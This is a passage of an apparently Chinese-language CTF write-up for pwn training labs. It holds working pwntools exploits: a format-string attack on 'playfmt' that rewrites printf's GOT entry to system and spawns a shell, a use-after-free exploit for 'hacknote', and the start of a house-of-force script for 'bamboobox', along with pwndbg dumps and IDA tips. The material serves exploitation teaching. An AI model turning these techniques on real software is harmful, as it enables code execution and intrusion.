0xf7d15276 (__libc_start_main+246) ◂— add esp, 0x10 </span><span class="s1">10:0040│ 0xffa07800 ◂— 0x1 </span><span class="s1">11:0044│ 0xffa07804 —▸ 0xf7eb0000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 </span><span class="s1">12:0048│ 0xffa07808 ◂— 0x0 </span><span class="s1">13:004c│ 0xffa0780c —▸ 0xf7d15276 (__libc_start_main+246) ◂— add esp, 0x10 </span><span class="s1">14:0050│ 0xffa07810 ◂— 0x1 </span><span class="s1">15:0054│ 0xffa07814 —▸ 0xffa078a4 —▸ 0xffa083d6 ◂— &#39;./playfmt&#39; </span><span class="s1">16:0058│ 0xffa07818 —▸ 0xffa078ac —▸ 0xffa083e0 ◂— &#39;NO_AT_BRIDGE=1&#39; </span><span class="s1">17:005c│ 0xffa0781c ◂— 0x0 </span><span class="s1">... ↓ </span><span class="s1">&#39;&#39;&#39;</span> <span class="n">payload</span> <span class="o">=</span> <span class="s2">&#34;%{}c%{}$hn&#34;</span><span class="o">.</span><span class="n">format</span><span class="p">((</span><span class="n">stack</span> <span class="o">+</span> <span class="mh">0x1c</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0xffff</span><span class="p">,</span> <span class="mh">0x15</span><span class="p">)</span> <span class="c1"># payload += &#34;%{}c%{}$hn&#34;.format((stack + 0x2c) &amp; 0xffff - (stack + 0x1c) &amp; 0xffff, 0x16)</span> <span class="n">payload</span> <span class="o">+=</span> <span class="s2">&#34;%{}c%{}$hn&#34;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="mh">0x10</span><span class="p">,</span> <span class="mh">0x16</span><span class="p">)</span> <span class="n">payload</span> <span class="o">+=</span> <span class="s1">&#39;22222222</span><span class="se">\0</span><span class="s1">&#39;</span> <span class="n">info</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendafter</span><span class="p">(</span><span class="s2">&#34;11111111&#34;</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span> <span class="n">pause</span><span class="p">()</span> <span class="s1">&#39;&#39;&#39; </span><span class="s1">pwndbg&gt; x/3s 0x804a060 </span><span class="s1">0x804a060 &lt;buf&gt;: &#34;</span><span class="si">%40976c</span><span class="s1">%57$hn%2&#34;... </span><span class="s1">0x804a06f &lt;buf+15&gt;: &#34;c%59$hn33333333&#34; </span><span class="s1">0x804a07e &lt;buf+30&gt;: &#34;&#34; </span><span class="s1">pwndbg&gt; stack 25 </span><span class="s1">00:0000│ esp 0xffa077c0 —▸ 0x804a060 (buf) ◂— 0x39303425 (&#39;%409&#39;) </span><span class="s1">01:0004│ 0xffa077c4 —▸ 0x8048640 ◂— jno 0x80486b7 /* &#39;quit&#39; */ </span><span class="s1">02:0008│ 0xffa077c8 ◂— 0x4 </span><span class="s1">03:000c│ 0xffa077cc —▸ 0x804857c (play+51) ◂— add esp, 0x10 </span><span class="s1">04:0010│ 0xffa077d0 —▸ 0x8048645 ◂— cmp eax, 0x3d3d3d3d </span><span class="s1">05:0014│ 0xffa077d4 —▸ 0xf7eb0000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 </span><span class="s1">06:0018│ ebp 0xffa077d8 —▸ 0xffa077e8 —▸ 0xffa077f8 ◂— 0x0 </span><span class="s1">07:001c│ 0xffa077dc —▸ 0x8048584 (play+59) ◂— nop </span><span class="s1">08:0020│ 0xffa077e0 —▸ 0xf7eb0d60 (_IO_2_1_stdout_) ◂— 0xfbad2887 </span><span class="s1">09:0024│ 0xffa077e4 ◂— 0x0 </span><span class="s1">0a:0028│ 0xffa077e8 —▸ 0xffa077f8 ◂— 0x0 </span><span class="s1">0b:002c│ 0xffa077ec —▸ 0x80485b1 (main+42) ◂— nop </span><span class="s1">0c:0030│ 0xffa077f0 —▸ 0xf7eb03dc (__exit_funcs) —▸ 0xf7eb11e0 (initial) ◂— 0x0 </span><span class="s1">0d:0034│ 0xffa077f4 —▸ 0xffa07810 ◂— 0x1 </span><span class="s1">0e:0038│ 0xffa077f8 ◂— 0x0 </span><span class="s1">0f:003c│ 0xffa077fc —▸ 0xf7d15276 (__libc_start_main+246) ◂— add esp, 0x10 </span><span class="s1">10:0040│ 0xffa07800 ◂— 0x1 </span><span class="s1">11:0044│ 0xffa07804 —▸ 0xf7eb0000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 </span><span class="s1">12:0048│ 0xffa07808 ◂— 0x0 </span><span class="s1">13:004c│ 0xffa0780c —▸ 0xf7d15276 (__libc_start_main+246) ◂— add esp, 0x10 </span><span class="s1">14:0050│ 0xffa07810 ◂— 0x1 </span><span class="s1">15:0054│ 0xffa07814 —▸ 0xffa078a4 —▸ 0xffa077dc —▸ 0x8048584 (play+59) ◂— nop </span><span class="s1">16:0058│ 0xffa07818 —▸ 0xffa078ac —▸ 0xffa077ec —▸ 0x80485b1 (main+42) ◂— nop </span><span class="s1">17:005c│ 0xffa0781c ◂— 0x0 </span><span class="s1">... ↓ </span><span class="s1">&#39;&#39;&#39;</span> <span class="c1"># gdb.attach(io, &#34;b *do_fmt+64\nc&#34;)</span> <span class="n">payload</span> <span class="o">=</span> <span class="s2">&#34;%{}c%{}$hn&#34;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">elf</span><span class="o">.</span><span class="n">got</span><span class="p">[</span><span class="s1">&#39;printf&#39;</span><span class="p">]</span> <span class="o">&amp;</span> <span class="mh">0xffff</span><span class="p">,</span> <span class="mh">0x39</span><span class="p">)</span> <span class="c1"># payload += &#34;%{}c%{}$hn&#34;.format((elf.got[&#39;printf&#39;] &amp; 0xffff + 2) - (elf.got[&#39;printf&#39;] &amp; 0xffff), 0x3b)</span> <span class="n">payload</span> <span class="o">+=</span> <span class="s2">&#34;%{}c%{}$hn&#34;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mh">0x3b</span><span class="p">)</span> <span class="n">payload</span> <span class="o">+=</span> <span class="s2">&#34;33333333</span><span class="se">\0</span><span class="s2">&#34;</span> <span class="n">info</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendafter</span><span class="p">(</span><span class="s2">&#34;22222222&#34;</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span> <span class="n">pause</span><span class="p">()</span> <span class="s1">&#39;&#39;&#39; </span><span class="s1">pwndbg&gt; x/3s 0x804a060 </span><span class="s1">0x804a060 &lt;buf&gt;: &#34;</span><span class="si">%211c</span><span class="s1">%11$hhn%31&#34;... </span><span class="s1">0x804a06f &lt;buf+15&gt;: &#34;325c%7$hn444444&#34;... </span><span class="s1">0x804a07e &lt;buf+30&gt;: &#34;44&#34; </span><span class="s1">pwndbg&gt; stack 25 </span><span class="s1">00:0000│ esp 0xffa077c0 —▸ 0x804a060 (buf) ◂— 0x31313225 (&#39;%211&#39;) </span><span class="s1">01:0004│ 0xffa077c4 —▸ 0x8048640 ◂— jno 0x80486b7 /* &#39;quit&#39; */ </span><span class="s1">02:0008│ 0xffa077c8 ◂— 0x4 </span><span class="s1">03:000c│ 0xffa077cc —▸ 0x804857c (play+51) ◂— add esp, 0x10 </span><span class="s1">04:0010│ 0xffa077d0 —▸ 0x8048645 ◂— cmp eax, 0x3d3d3d3d </span><span class="s1">05:0014│ 0xffa077d4 —▸ 0xf7eb0000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 </span><span class="s1">06:0018│ ebp 0xffa077d8 —▸ 0xffa077e8 —▸ 0xffa077f8 ◂— 0x0 </span><span class="s1">07:001c│ 0xffa077dc —▸ 0x804a010 (_GLOBAL_OFFSET_TABLE_+16) —▸ 0xf7d46930 (printf) ◂— call 0xf7e1dae9 </span><span class="s1">08:0020│ 0xffa077e0 —▸ 0xf7eb0d60 (_IO_2_1_stdout_) ◂— 0xfbad2887 </span><span class="s1">09:0024│ 0xffa077e4 ◂— 0x0 </span><span class="s1">0a:0028│ 0xffa077e8 —▸ 0xffa077f8 ◂— 0x0 </span><span class="s1">0b:002c│ 0xffa077ec —▸ 0x804a012 (_GLOBAL_OFFSET_TABLE_+18) ◂— 0xc870f7d4 </span><span class="s1">0c:0030│ 0xffa077f0 —▸ 0xf7eb03dc (__exit_funcs) —▸ 0xf7eb11e0 (initial) ◂— 0x0 </span><span class="s1">0d:0034│ 0xffa077f4 —▸ 0xffa07810 ◂— 0x1 </span><span class="s1">0e:0038│ 0xffa077f8 ◂— 0x0 </span><span class="s1">0f:003c│ 0xffa077fc —▸ 0xf7d15276 (__libc_start_main+246) ◂— add esp, 0x10 </span><span class="s1">10:0040│ 0xffa07800 ◂— 0x1 </span><span class="s1">11:0044│ 0xffa07804 —▸ 0xf7eb0000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 </span><span class="s1">12:0048│ 0xffa07808 ◂— 0x0 </span><span class="s1">13:004c│ 0xffa0780c —▸ 0xf7d15276 (__libc_start_main+246) ◂— add esp, 0x10 </span><span class="s1">14:0050│ 0xffa07810 ◂— 0x1 </span><span class="s1">15:0054│ 0xffa07814 —▸ 0xffa078a4 —▸ 0xffa077dc —▸ 0x804a010 (_GLOBAL_OFFSET_TABLE_+16) ◂— 0xf7d46930 </span><span class="s1">16:0058│ 0xffa07818 —▸ 0xffa078ac —▸ 0xffa077ec —▸ 0x804a012 (_GLOBAL_OFFSET_TABLE_+18) ◂— 0xc870f7d4 </span><span class="s1">17:005c│ 0xffa0781c ◂— 0x0 </span><span class="s1">... ↓ </span><span class="s1">pwndbg&gt; n </span><span class="s1">0x08048540 in do_fmt () </span><span class="s1">LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA </span><span class="s1">────────────────────────[ REGISTERS ]──────────────────────── </span><span class="s1"> EAX 0x7b38 </span><span class="s1"> EBX 0x0 </span><span class="s1"> ECX 0xffa052a0 ◂— 0x20202020 (&#39; &#39;) </span><span class="s1"> EDX 0xf7eb1870 (_IO_stdfile_1_lock) ◂— 0x0 </span><span class="s1"> EDI 0xf7eb0000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 </span><span class="s1"> ESI 0x1 </span><span class="s1"> EBP 0xffa077d8 —▸ 0xffa077e8 —▸ 0xffa077f8 ◂— 0x0 </span><span class="s1"> ESP 0xffa077c0 —▸ 0x804a060 (buf) ◂— 0x31313225 (&#39;%211&#39;) </span><span class="s1"> EIP 0x8048540 (do_fmt+69) ◂— add esp, 0x10 </span><span class="s1">─────────────────────────[ DISASM ]────────────────────────── </span><span class="s1"> 0x804853b &lt;do_fmt+64&gt; call printf@plt &lt;0x80483a0&gt; </span><span class="s1"> </span><span class="s1"> ► 0x8048540 &lt;do_fmt+69&gt; add esp, 0x10 </span><span class="s1"> 0x8048543 &lt;do_fmt+72&gt; jmp do_fmt+6 &lt;0x8048501&gt; </span><span class="s1"> ↓ </span><span class="s1"> 0x8048501 &lt;do_fmt+6&gt; sub esp, 4 </span><span class="s1"> 0x8048504 &lt;do_fmt+9&gt; push 0xc8 </span><span class="s1"> 0x8048509 &lt;do_fmt+14&gt; push buf &lt;0x804a060&gt; </span><span class="s1"> 0x804850e &lt;do_fmt+19&gt; push 0 </span><span class="s1"> 0x8048510 &lt;do_fmt+21&gt; call read@plt &lt;0x8048390&gt; </span><span class="s1"> </span><span class="s1"> 0x8048515 &lt;do_fmt+26&gt; add esp, 0x10 </span><span class="s1"> 0x8048518 &lt;do_fmt+29&gt; sub esp, 4 </span><span class="s1"> 0x804851b &lt;do_fmt+32&gt; push 4 </span><span class="s1">──────────────────────────[ STACK ]────────────────────────── </span><span class="s1">00:0000│ esp 0xffa077c0 —▸ 0x804a060 (buf) ◂— 0x31313225 (&#39;%211&#39;) </span><span class="s1">01:0004│ 0xffa077c4 —▸ 0x8048640 ◂— jno 0x80486b7 /* &#39;quit&#39; */ </span><span class="s1">02:0008│ 0xffa077c8 ◂— 0x4 </span><span class="s1">03:000c│ 0xffa077cc —▸ 0x804857c (play+51) ◂— add esp, 0x10 </span><span class="s1">04:0010│ 0xffa077d0 —▸ 0x8048645 ◂— cmp eax, 0x3d3d3d3d </span><span class="s1">05:0014│ 0xffa077d4 —▸ 0xf7eb0000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 </span><span class="s1">06:0018│ ebp 0xffa077d8 —▸ 0xffa077e8 —▸ 0xffa077f8 ◂— 0x0 </span><span class="s1">07:001c│ 0xffa077dc —▸ 0x804a010 (_GLOBAL_OFFSET_TABLE_+16) —▸ 0xf7d37b30 (system) ◂— sub esp, 0xc </span><span class="s1">────────────────────────[ BACKTRACE ]──────────────────────── </span><span class="s1"> ► f 0 8048540 do_fmt+69 </span><span class="s1"> f 1 804a010 _GLOBAL_OFFSET_TABLE_+16 </span><span class="s1"> f 2 f7eb0d60 _IO_2_1_stdout_ </span><span class="s1"> f 3 804a012 _GLOBAL_OFFSET_TABLE_+18 </span><span class="s1"> f 4 f7eb03dc __exit_funcs </span><span class="s1"> f 5 ffa07810 </span><span class="s1"> f 6 f7d15276 __libc_start_main+246 </span><span class="s1">pwndbg&gt; stack 25 </span><span class="s1">00:0000│ esp 0xffa077c0 —▸ 0x804a060 (buf) ◂— 0x31313225 (&#39;%211&#39;) </span><span class="s1">01:0004│ 0xffa077c4 —▸ 0x8048640 ◂— jno 0x80486b7 /* &#39;quit&#39; */ </span><span class="s1">02:0008│ 0xffa077c8 ◂— 0x4 </span><span class="s1">03:000c│ 0xffa077cc —▸ 0x804857c (play+51) ◂— add esp, 0x10 </span><span class="s1">04:0010│ 0xffa077d0 —▸ 0x8048645 ◂— cmp eax, 0x3d3d3d3d </span><span class="s1">05:0014│ 0xffa077d4 —▸ 0xf7eb0000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 </span><span class="s1">06:0018│ ebp 0xffa077d8 —▸ 0xffa077e8 —▸ 0xffa077f8 ◂— 0x0 </span><span class="s1">07:001c│ 0xffa077dc —▸ 0x804a010 (_GLOBAL_OFFSET_TABLE_+16) —▸ 0xf7d37b30 (system) ◂— sub esp, 0xc </span><span class="s1">08:0020│ 0xffa077e0 —▸ 0xf7eb0d60 (_IO_2_1_stdout_) ◂— 0xfbad2887 </span><span class="s1">09:0024│ 0xffa077e4 ◂— 0x0 </span><span class="s1">0a:0028│ 0xffa077e8 —▸ 0xffa077f8 ◂— 0x0 </span><span class="s1">0b:002c│ 0xffa077ec —▸ 0x804a012 (_GLOBAL_OFFSET_TABLE_+18) ◂— 0xc870f7d3 </span><span class="s1">0c:0030│ 0xffa077f0 —▸ 0xf7eb03dc (__exit_funcs) —▸ 0xf7eb11e0 (initial) ◂— 0x0 </span><span class="s1">0d:0034│ 0xffa077f4 —▸ 0xffa07810 ◂— 0x1 </span><span class="s1">0e:0038│ 0xffa077f8 ◂— 0x0 </span><span class="s1">0f:003c│ 0xffa077fc —▸ 0xf7d15276 (__libc_start_main+246) ◂— add esp, 0x10 </span><span class="s1">10:0040│ 0xffa07800 ◂— 0x1 </span><span class="s1">11:0044│ 0xffa07804 —▸ 0xf7eb0000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 </span><span class="s1">12:0048│ 0xffa07808 ◂— 0x0 </span><span class="s1">13:004c│ 0xffa0780c —▸ 0xf7d15276 (__libc_start_main+246) ◂— add esp, 0x10 </span><span class="s1">14:0050│ 0xffa07810 ◂— 0x1 </span><span class="s1">15:0054│ 0xffa07814 —▸ 0xffa078a4 —▸ 0xffa077dc —▸ 0x804a010 (_GLOBAL_OFFSET_TABLE_+16) ◂— 0xf7d37b30 </span><span class="s1">16:0058│ 0xffa07818 —▸ 0xffa078ac —▸ 0xffa077ec —▸ 0x804a012 (_GLOBAL_OFFSET_TABLE_+18) ◂— 0xc870f7d3 </span><span class="s1">17:005c│ 0xffa0781c ◂— 0x0 </span><span class="s1">... ↓ </span><span class="s1">pwndbg&gt; got </span><span class="s1"> </span><span class="s1">GOT protection: Partial RELRO | GOT functions: 6 </span><span class="s1"> </span><span class="s1">[0x804a00c] read@GLIBC_2.0 -&gt; 0xf7dd3c50 (read) ◂— cmp dword ptr gs:[0xc], 0 </span><span class="s1">[0x804a010] printf@GLIBC_2.0 -&gt; 0xf7d37b30 (system) ◂— sub esp, 0xc </span><span class="s1">[0x804a014] puts@GLIBC_2.0 -&gt; 0xf7d5c870 (puts) ◂— push ebp </span><span class="s1">[0x804a018] __libc_start_main@GLIBC_2.0 -&gt; 0xf7d15180 (__libc_start_main) ◂— push ebp </span><span class="s1">[0x804a01c] setvbuf@GLIBC_2.0 -&gt; 0xf7d5cff0 (setvbuf) ◂— push ebp </span><span class="s1">[0x804a020] strncmp@GLIBC_2.0 -&gt; 0xf7e3a5d0 (__strncmp_sse4_2) ◂— push ebp </span><span class="s1">&#39;&#39;&#39;</span> <span class="c1"># gdb.attach(io, &#34;b *do_fmt+64\nc&#34;)</span> <span class="n">payload</span> <span class="o">=</span> <span class="s2">&#34;%{}c%{}$hhn&#34;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">libc</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;system&#39;</span><span class="p">]</span> <span class="o">&gt;&gt;</span> <span class="mi">16</span> <span class="o">&amp;</span> <span class="mh">0xff</span><span class="p">,</span> <span class="mh">0xb</span><span class="p">)</span> <span class="n">payload</span> <span class="o">+=</span> <span class="s2">&#34;%{}c%{}$hn&#34;</span><span class="o">.</span><span class="n">format</span><span class="p">((</span><span class="n">libc</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;system&#39;</span><span class="p">]</span> <span class="o">&amp;</span> <span class="mh">0xffff</span><span class="p">)</span> <span class="o">-</span> <span class="p">(</span><span class="n">libc</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;system&#39;</span><span class="p">]</span> <span class="o">&gt;&gt;</span> <span class="mi">16</span> <span class="o">&amp;</span> <span class="mh">0xff</span><span class="p">),</span> <span class="mh">0x7</span><span class="p">)</span> <span class="n">payload</span> <span class="o">+=</span> <span class="s1">&#39;44444444</span><span class="se">\0</span><span class="s1">&#39;</span> <span class="n">info</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendafter</span><span class="p">(</span><span class="s2">&#34;33333333&#34;</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span> <span class="n">pause</span><span class="p">()</span> <span class="n">io</span><span class="o">.</span><span class="n">sendafter</span><span class="p">(</span><span class="s2">&#34;44444444&#34;</span><span class="p">,</span> <span class="s2">&#34;/bin/sh</span><span class="se">\0</span><span class="s2">&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span> <span class="n">io</span><span class="o">.</span><span class="n">close</span><span class="p">()</span> </code></pre></td></tr></table> </div> </div><blockquote> <p>可以通过设置标记变量(如我 exp 中的 11111111, 22222222 等)进行输入输出的定位</p> </blockquote> <h3 id="lab10-hacknote">lab10-hacknote</h3> <p>最简单的一种 fastbin uaf 利用，结构体中有函数指针，通过 uaf 控制该函数指针指向 magic 函数即可，uaf 的介绍可以看这个 <a href="https://github.com/M4xW4n9/slides/blob/master/pwn_heap/malloc-150821074656-lva1-app6891.pdf"><strong>slide</strong></a></p> <p>exp:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="n">lab10</span> <span class="p">[</span><span class="n">master</span><span class="err">●</span><span class="p">]</span> <span class="n">cat</span> <span class="n">solve</span><span class="o">.</span><span class="n">py</span> <span class="c1">#!/usr/bin/env python</span> <span class="c1"># -*- coding: utf-8 -*-</span> <span class="n">__Auther__</span> <span class="o">=</span> <span class="s1">&#39;M4x&#39;</span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="n">context</span><span class="o">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s2">&#34;debug&#34;</span> <span class="n">context</span><span class="o">.</span><span class="n">terminal</span> <span class="o">=</span> <span class="p">[</span><span class="s2">&#34;deepin-terminal&#34;</span><span class="p">,</span> <span class="s2">&#34;-x&#34;</span><span class="p">,</span> <span class="s2">&#34;sh&#34;</span><span class="p">,</span> <span class="s2">&#34;-c&#34;</span><span class="p">]</span> <span class="k">def</span> <span class="nf">debug</span><span class="p">():</span> <span class="nb">raw_input</span><span class="p">(</span><span class="s2">&#34;DEBUG: &#34;</span><span class="p">)</span> <span class="n">gdb</span><span class="o">.</span><span class="n">attach</span><span class="p">(</span><span class="n">io</span><span class="p">)</span> <span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s2">&#34;./hacknote&#34;</span><span class="p">)</span> <span class="n">elf</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s2">&#34;./hacknote&#34;</span><span class="p">)</span> <span class="n">magic_elf</span> <span class="o">=</span> <span class="n">elf</span><span class="o">.</span><span class="n">symbols</span><span class="p">[</span><span class="s2">&#34;magic&#34;</span><span class="p">]</span> <span class="k">def</span> <span class="nf">addNote</span><span class="p">(</span><span class="n">size</span><span class="p">,</span> <span class="n">content</span><span class="p">):</span> <span class="n">io</span><span class="o">.</span><span class="n">sendafter</span><span class="p">(</span><span class="s2">&#34;choice :&#34;</span><span class="p">,</span> <span class="s2">&#34;1&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendafter</span><span class="p">(</span><span class="s2">&#34;size &#34;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">size</span><span class="p">))</span> <span class="n">io</span><span class="o">.</span><span class="n">sendafter</span><span class="p">(</span><span class="s2">&#34;Content :&#34;</span><span class="p">,</span> <span class="n">content</span><span class="p">)</span> <span class="k">def</span> <span class="nf">delNote</span><span class="p">(</span><span class="n">idx</span><span class="p">):</span> <span class="c1"># debug()</span> <span class="n">io</span><span class="o">.</span><span class="n">sendafter</span><span class="p">(</span><span class="s2">&#34;choice :&#34;</span><span class="p">,</span> <span class="s2">&#34;2&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendafter</span><span class="p">(</span><span class="s2">&#34;Index :&#34;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">idx</span><span class="p">))</span> <span class="k">def</span> <span class="nf">printNote</span><span class="p">(</span><span class="n">idx</span><span class="p">):</span> <span class="c1"># debug()</span> <span class="n">io</span><span class="o">.</span><span class="n">sendafter</span><span class="p">(</span><span class="s2">&#34;choice :&#34;</span><span class="p">,</span> <span class="s2">&#34;3&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendafter</span><span class="p">(</span><span class="s2">&#34;Index :&#34;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">idx</span><span class="p">))</span> <span class="k">def</span> <span class="nf">uaf</span><span class="p">():</span> <span class="n">addNote</span><span class="p">(</span><span class="mi">24</span><span class="p">,</span> <span class="s2">&#34;a&#34;</span> <span class="o">*</span> <span class="mi">24</span><span class="p">)</span> <span class="n">addNote</span><span class="p">(</span><span class="mi">24</span><span class="p">,</span> <span class="s2">&#34;b&#34;</span> <span class="o">*</span> <span class="mi">24</span><span class="p">)</span> <span class="n">delNote</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="n">delNote</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="c1"># debug()</span> <span class="n">addNote</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span><span class="n">p32</span><span class="p">(</span><span class="n">magic_elf</span><span class="p">))</span> <span class="n">printNote</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">&#34;__main__&#34;</span><span class="p">:</span> <span class="n">uaf</span><span class="p">()</span> <span class="n">io</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span> <span class="n">io</span><span class="o">.</span><span class="n">close</span><span class="p">()</span> </code></pre></td></tr></table> </div> </div><blockquote> <p>说一下怎么修复 IDA 中的结构体</p> <p>识别出结构体的具体结构后</p> <ul> <li> <p>shift+F1, insert 插入识别出的结果</p> <p><img src="http://ww1.sinaimg.cn/large/006AWYXBly1fq30oi6hn6j30qt0hgjsc.jpg" alt=""></p> </li> <li> <p>shift+F9, insert 导入我们刚添加的 local type</p> <p><img src="http://ww1.sinaimg.cn/large/006AWYXBly1fq30podbi2j31490m8jwq.jpg" alt=""></p> </li> <li> <p>然后我们在结构体变量上 y 一下，制定其数据类型即可</p> <p><img src="http://ww1.sinaimg.cn/large/006AWYXBly1fq30qp97hyj30nn06zt9k.jpg" alt=""></p> </li> <li> <p>修复的效果图如下：</p> <p><img src="http://ww1.sinaimg.cn/large/006AWYXBly1fq30rb5bzyj30gd03lmxn.jpg" alt=""></p> </li> </ul> </blockquote> <h3 id="lab11-bamboobox">lab11-bamboobox</h3> <p>可以种 house of force，也可以使用 unsafe unlink，先说 house of force 的方法</p> <h4 id="house-of-force">house of force</h4> <p>简单说一下我对 hof 的理解，如果我们能控制 <strong>top_chunk</strong> 的 <strong>size</strong>，那么我们就可以通过控制 malloc 一些精心设计的<strong>大数/负数</strong>来实现控制 top_chunk 的指针，就可以实现任意地址写的效果，个人感觉，hof 的核心思想就在这个 force 上，疯狂 malloc，简单粗暴效果明显</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="n">lab11</span> <span class="p">[</span><span class="n">master</span><span class="err">●</span><span class="p">]</span> <span class="n">cat</span> <span class="n">hof</span><span class="o">.</span><span class="n">py</span> <span class="c1">#!/usr/bin/env python</span> <span class="c1"># -*- coding: utf-8 -*-</span> <span class="n">__Auther__</span> <span class="o">=</span> <span class="s1">&#39;M4x&#39;</span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="kn">from</span> <span class="nn">zio</span> <span class="kn">import</span> <span class="n">l64</span> <span class="kn">from</span> <span class="nn">time</span> <span class="kn">import</span> <span class="n">sleep</span> <span class="kn">import</span> <span class="nn">sys</span> <span class="n">context</span><span class="o">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s2">&#34;debug&#34;</span> <span class="n">context</span><span class="o">.</span><span class="n">terminal</span> <span class="o">=</span> <span class="p">[</span><span class="s2">&#34;deepin-terminal&#34;</span><span class="p">,</span> <span class="s2">&#34;-x&#34;</span><span class="p">,</span> <span class="s2">&#34;sh&#34;</span><span class="p">,</span> <span class="s2">&#34;-c&#34;</span><span class="p">]</span> <span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s2">&#34;./bamboobox&#34;</span><span class="p">)</span> <span class="k">def</span> <span class="nf">DEBUG</span><span class="p">():</span> <span class="nb">raw_input</span><span class="p">(</span><span class="s2">&#34;DEBUG: &#34;</span><span class="p">)</span> <span class="n">gdb</span><span class="o">.</span><span class="n">attach</span><span class="p">(</span><span class="n">io</span><span class="p">)</span> <span class="k">def</span> <span class="nf">add</span><span class="p">(</span><span class="n">length</span><span class="p">,</span> <span class="n">name</span><span class="p">):</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span 